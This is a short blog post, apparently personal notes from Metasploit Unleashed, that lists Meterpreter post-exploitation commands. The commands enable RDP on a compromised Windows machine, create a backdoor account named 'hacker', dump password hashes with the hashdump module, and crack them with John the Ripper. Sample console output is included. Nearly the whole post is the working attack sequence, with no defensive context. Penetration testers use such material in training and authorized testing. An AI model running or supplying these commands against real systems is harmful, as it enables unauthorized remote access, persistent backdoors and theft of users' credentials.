Tuesday, January 15, 2013

msf post exploit

Source Metasploit Unleashed 

Enable RDP

meterpreter > run getgui -h

meterpreter > run getgui -u hacker -p password

DONE! Connect using RDP

JTR

background session

meterpreter > background

msf auxiliary(handler) > use post/windows/gather/hashdump
msf post(hashdump) > set session 1

msf post(hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY bffad2dcc991597aaa19f90e8bc4ee00...
[*] Obtaining the user list and keys...

msf post(hashdump) > use auxiliary/analyze/jtr_crack_fast
msf auxiliary(jtr_crack_fast) > run

[*] Seeded the password database with 8 words...

No comments:

Post a Comment